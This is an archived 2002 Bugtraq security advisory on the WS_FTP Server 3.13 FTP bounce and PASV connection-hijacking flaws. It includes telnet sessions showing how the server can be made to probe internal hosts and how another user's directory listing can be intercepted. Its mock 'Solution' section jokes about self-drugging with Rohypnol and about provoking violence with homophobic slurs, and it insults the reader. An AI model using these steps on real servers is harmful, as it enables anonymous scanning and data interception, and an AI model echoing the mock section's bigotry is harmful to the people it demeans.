Home page logo
/

bugtraq logo Bugtraq mailing list archives

IPSwitch, Inc. WS_FTP Server
From: dev-null () no-id com
Date: 25 Oct 2002 14:06:34 -0000

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Product:   IPSwitch, Inc. WS_FTP Server
Versions:  v3.13 (dated 2002.08.07), possibly others.
Severity:  Medium-Hot


Author:    low halo <lowhalo () hushmail com>
Date:      October 25th, 2002
Revision:  1.0




{ Overview }

    WS_FTP v3.13 by IPSwitch, Inc., is vulnerable to the classic FTP bounce
attack as well as PASV connection hijacking.



{ Impact }

    The FTP bounce vulnerability allows a remote attacker to cause the FTP
server to create a connection to any IP address on any TCP port greater than
1024.  Thus, the attacker can scan Internet addresses anonymously along with
any internal addresses that the FTP server has access to.  More information
on this vulnerability can be found here:
        http://www.cert.org/advisories/CA-1997-27.html.
    The PASV connection hijacking vulnerability allows a remote attacker to
intercept directory listings and file downloads from other users; file uploads
may also be spoofed.  No authentication is necessary to execute this attack.
More information on this vulnerability can be found here:
        http://www.kb.cert.org/vuls/id/2558.



{ Details }

    This demonstrates the FTP bounce vulnerability.  The internal IP address,
"192.168.1.20", is listening on port 8080, and "192.168.2.30" is dead or not
accessible via port 8080:

$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.


This demonstrates the PASV connection hijacking vulnerability:

$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing


Next, from another IP address:

$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x---  2 lowhalo     System            0 Jan  0 00:00 .
drwxr-x---  2 lowhalo     System            0 Jan  0 00:00 ..
- -rwxr-x---  1 lowhalo     System         1337 Jan  0 00:00 lh
Connection closed by foreign host.



{ Solution }

    1.)  Mix yourself a Long Island Iced Tea.
    2.)  Buy more Rohypnol from Paco on 7th & 30th ('cuz you used up the
          box you bought last time to get yourself out of that chicken-
          suit bind last Wednesday, remember??).
    3.)  While you're not looking, slip yourself two (2) crushed 100mg pills.
    4.)  Drink your Long Island while pretending to be flirting with someone
          in a bar environment (but in fact, you're still in your lonely,
          lonely apartment because you're a fucking looser and you're gonna
          die alone 28 years from now).
    5.)  Put on those crotchless leather pants that you got in your closet.
          But this time, don't wear anything underneath.  Not even
          underwear.
    6.)  Go to the local gay bar, even though you're not gay, and wait
          outside 'till that warm fuzzy roofies feeling starts crawling up
          your back.
    7.)  Go inside the bar and look for the menacing black biker guy named
          Steve (Hey, how did you know his name is Steve if you're not
          gay, huh??).  Take the deepest breath you can and scream at the
          top of your lungs every homosexual slur that you can think of
          right in the guy's face.
    8.)  Wake up 16 hours later at the bottom of a ditch in a pool of your
          own blood with that, "uh-oh, I think I forgot my jacket at the
          bar" feeling.
    9.)  Try to figure out exactly what happened, and LAUGH YOUR ASS OFF
          when you do.
    10.) Die alone 28 years from now, you fucking looser.


    (Yeah, so anyways, IPSwitch never got back to me after two weeks, so
    there is no solution to this problem.)


{ Conclusion }

    A big huge shout-out goes to HACKTIVISMO (http://www.hacktivismo.com/)!!
You guys have a lot to be proud of.

    And here's a quote I'd like all those iDEFENSE research contributors to
read:

        "Few men have the virtue to withstand the highest bidder."
            - George Washington




        low halo <lowhalo () hushmail com>
        Defender of Truth and Liberty

        http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9BFD99BF
        58CE 3215 226A 69ED 4D20  4044 C925 54F9 9BFD 99BF


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)

iD8DBQE9uF67ySVU+Zv9mb8RAplZAJ0WhQbCfyjFWyNc8hfgIySKqFspBACeLFHb
8LkuAxTfsHywHMYA7SlCL8M=
=G5ln
-----END PGP SIGNATURE-----


--
This message has been sent via an anonymous mail relay at www.no-id.com.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault